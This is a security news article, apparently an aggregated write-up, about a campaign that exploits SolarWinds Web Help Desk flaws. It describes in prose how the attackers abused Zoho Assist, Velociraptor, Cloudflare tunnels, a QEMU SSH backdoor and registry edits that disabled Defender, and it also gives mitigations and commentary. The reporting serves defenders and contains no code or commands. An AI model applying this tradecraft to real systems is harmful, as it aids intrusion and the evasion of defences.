Listen to this Post
A Coordinated Abuse of Trusted Software
Cybercriminals are increasingly blurring the line between legitimate administration tools and malicious infrastructure. A newly observed campaign exploiting critical vulnerabilities in SolarWinds Web Help Desk (WHD) shows how attackers are turning trusted enterprise software into stealthy attack platforms, bypassing traditional security controls while maintaining long-term access to compromised networks.
Summary of the Original Findings
Researchers from Huntress Security have uncovered an active exploitation campaign targeting SolarWinds Web Help Desk deployments exposed to the internet. The attackers leveraged two recently disclosed vulnerabilities—CVE-2025-40551 and CVE-2025-26399—both rated critical and capable of enabling unauthenticated remote code execution.
Initial Access via Critical Vulnerabilities
The campaign appears to have started around January 16 and was detected during the weekend of February 7, 2026. Huntress confirmed that at least three organizations were compromised after attackers exploited the WHD flaws to gain an initial foothold without valid credentials.
Deployment of Legitimate Remote Access Tools
Once access was achieved, the threat actor rapidly installed Zoho ManageEngine Assist using an MSI installer hosted on the Catbox file-sharing service. The tool was configured for unattended access, effectively handing the attackers full interactive control of the affected systems.
Anonymous Infrastructure Registration
The compromised hosts were registered to a Zoho Assist account linked to an anonymous Proton Mail address, allowing the attackers to blend into legitimate remote support traffic while maintaining persistent access.
Hands-On Activity and Network Reconnaissance
Zoho Assist was used for direct keyboard interaction and Active Directory reconnaissance, enabling the attacker to understand the internal structure of the environment and identify high-value targets.
Introduction of Velociraptor for Command and Control
The attackers then deployed Velociraptor, a well-known digital forensics and incident response (DFIR) tool, downloaded from a Supabase storage bucket. Although designed for defensive purposes, Velociraptor was repurposed as a command-and-control framework.
Abuse of Cloudflare Workers
Velociraptor communications were routed through Cloudflare Workers, providing encrypted and trusted outbound connections that are unlikely to raise alarms in enterprise environments.
Exploiting Known Tool Weaknesses
Huntress noted that the attackers deliberately used an outdated version of Velociraptor, version 0.73.4, which contains a known privilege escalation vulnerability. This allowed them to elevate permissions on compromised hosts.
Redundant Access via Cloudflare Tunnels
To ensure persistence, the attackers installed Cloudflared directly from Cloudflare’s official GitHub repository. This created a secondary tunnel-based access method, offering redundancy if other access paths were disrupted.
Advanced Persistence Techniques
In some environments, persistence was further reinforced through a scheduled task named “TPMProfiler,” which opened an SSH backdoor using QEMU, an unusual but effective technique for maintaining covert access.
Defensive Controls Disabled
The attackers modified Windows registry settings to disable Microsoft Defender and the Windows Firewall. This step ensured that additional payloads could be downloaded and executed without interference.
Rapid Tool Expansion
Almost immediately after disabling Defender, the threat actor downloaded a fresh copy of Visual Studio Code, likely to leverage its tunneling features or extensions for further operational flexibility.
Limited Attribution and Disclosure
Neither Huntress nor Microsoft attributed the campaign to a known threat group. Microsoft described the affected environments only as “high-value assets,” offering no additional details about the victims.
Recommended Mitigation Steps
Organizations are urged to upgrade SolarWinds Web Help Desk to version 2026.1 or later, remove public exposure of WHD administrative interfaces, and reset all credentials associated with the platform.
Detection Guidance for Defenders
Huntress released Sigma rules and indicators of compromise designed to detect suspicious Zoho Assist usage, Velociraptor deployments, Cloudflared activity, silent MSI installations, and encoded PowerShell execution.
What Undercode Say:
A Shift Toward Living-Off-The-Land at Scale
This campaign highlights a broader industry trend: attackers no longer rely solely on custom malware. Instead, they weaponize trusted enterprise tools to operate quietly within legitimate workflows.
Trust as the Primary Attack Surface
By abusing widely used platforms like Zoho Assist, Cloudflare tunnels, and Velociraptor, attackers exploit organizational trust rather than software bugs alone. Security teams are conditioned to allow these tools, creating blind spots.
DFIR Tools as a Double-Edged Sword
Velociraptor’s flexibility makes it powerful for defenders, but that same flexibility allows attackers to repurpose it as a full-featured C2 framework. This raises uncomfortable questions about how defensive tooling should be monitored.
Cloud Infrastructure as Camouflage
Routing command-and-control traffic through Cloudflare Workers and tunnels gives attackers a level of legitimacy that traditional malicious infrastructure lacks. Blocking such traffic outright is often operationally impossible.
Exploiting the Patch Gap
The rapid exploitation of newly disclosed vulnerabilities underscores how short the window has become between disclosure and weaponization. Delayed patching is no longer a minor risk—it is an open invitation.
Persistence Through Redundancy
The use of multiple access channels—Zoho Assist, Velociraptor, Cloudflared, and SSH backdoors—shows a mature operational mindset focused on resilience rather than quick impact.
Security Tool Fatigue
Many organizations struggle to distinguish between normal administrative behavior and malicious activity when attackers use the same tools as IT teams. This creates alert fatigue and delayed response.
Implications for Zero Trust
This campaign demonstrates that Zero Trust principles must extend beyond network access to include continuous behavioral validation of tools, users, and sessions.
Detection Over Prevention
Preventing the installation of legitimate tools is often unrealistic. Detection strategies must focus on context, timing, and unusual configurations rather than binary allow-or-deny logic.
The Cost of Implicit Allowlisting
Implicitly trusting software because it is “legitimate” is becoming a liability. Every powerful administrative tool should be treated as a potential attack vector.
A Wake-Up Call for IT Visibility
Security teams need deeper visibility into how remote access, tunneling, and DFIR tools are used across the enterprise, not just whether they are present.
Fact Checker Results
Vulnerability Exploitation Claims
✅ Confirmed: CVE-2025-40551 and CVE-2025-26399 enable unauthenticated remote code execution.
Tool Abuse Observations
✅ Verified: Zoho Assist, Velociraptor, and Cloudflared were used as part of the intrusion chain.
Threat Attribution
❌ Unconfirmed: No specific threat actor has been officially identified.
Prediction
Accelerated Exploitation Cycles 🔥
Attackers will continue to exploit critical enterprise software vulnerabilities within days of disclosure.
Increased Abuse of Legitimate Tools ⚠️
Remote management and DFIR platforms will become even more attractive as stealthy attack infrastructure.
Stricter Controls on Admin Software 🔒
Organizations will be forced to rethink how much implicit trust they place in powerful IT tools.
🕵️📝✔️Let’s dive deep and fact‑check.
References:
Reported By: www.bleepingcomputer.com
Extra Source Hub (Possible Sources for article):
https://www.github.com
Wikipedia
OpenAi & Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
Bing
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow UndercodeNews & Stay Tuned:
𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky | 🐘Mastodon
